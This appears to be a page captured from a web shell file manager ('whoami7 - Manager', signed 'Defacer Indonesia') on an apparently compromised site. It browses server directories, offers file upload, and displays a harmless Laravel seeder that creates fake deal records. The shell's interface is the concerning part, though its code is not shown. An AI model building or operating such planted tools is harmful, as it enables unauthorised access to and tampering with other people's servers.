whoami7 - Manager
:
/
home
/
kckglobal
/
public_html
/
portal
/
database
/
seeders
/
Upload File:
files >> /home/kckglobal/public_html/portal/database/seeders/LeadsTableSeeder.php
<?php namespace Database\Seeders; use App\Models\Deal; use App\Models\LeadAgent; use App\Models\Lead; use App\Models\LeadPipeline; use App\Models\PipelineStage; use App\Models\LeadStatus; use Illuminate\Database\Seeder; use App\Traits\UniversalSearchTrait; class LeadsTableSeeder extends Seeder { use UniversalSearchTrait; /** * Run the database seeds. * * @return void */ public function run($companyId) { $count = config('app.seed_record_count'); $faker = \Faker\Factory::create(); $leadAgents = $this->getLeadAgent($companyId); $getPipeline = $this->getPipeline($companyId); $getLeadStage = $this->getLeadStage($companyId); $getLeadContact = $this->getContact($companyId); Deal::factory() ->count((int)$count) ->make() ->each(function (Deal $deal) use ($companyId, $faker, $leadAgents, $getPipeline, $getLeadStage, $getLeadContact) { $deal->company_id = $companyId; $deal->agent_id = $faker->randomElement($leadAgents); $deal->lead_pipeline_id = $faker->randomElement($getPipeline); $deal->pipeline_stage_id = $faker->randomElement($getLeadStage); $deal->lead_id = $faker->randomElement($getLeadContact); $deal->save(); $deal->name = $deal->contact->client_name . '-' . $deal->id; $deal->save(); }); } private function getLeadAgent($companyId) { return LeadAgent::where('company_id', $companyId)->pluck('id')->toArray(); } private function getLeadStatus($companyId) { return LeadStatus::where('company_id', $companyId)->pluck('id')->toArray(); } private function getPipeline($companyId) { return LeadPipeline::where('company_id', $companyId)->pluck('id')->toArray(); } private function getLeadStage($companyId) { $leadPipeline = LeadPipeline::where('company_id', $companyId)->first(); return PipelineStage::where('company_id', $companyId)->where('lead_pipeline_id', $leadPipeline->id)->pluck('id')->toArray(); } private function getContact($companyId) { return Lead::where('company_id', $companyId)->pluck('id')->toArray(); } }
Copyright ©2021 || Defacer Indonesia